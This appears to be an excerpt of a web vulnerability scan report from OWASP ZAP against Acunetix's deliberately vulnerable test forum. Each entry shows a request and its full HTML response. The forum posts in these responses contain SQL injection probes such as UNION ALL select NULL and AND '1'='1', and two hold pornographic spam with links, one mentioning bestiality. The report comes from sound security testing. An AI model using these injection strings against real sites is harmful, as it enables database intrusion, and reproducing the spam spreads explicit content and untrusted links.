Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3067 |
| Response Body - size: 3,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:35 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3375 |
| Response Body - size: 3,375 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3437 |
| Response Body - size: 3,437 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
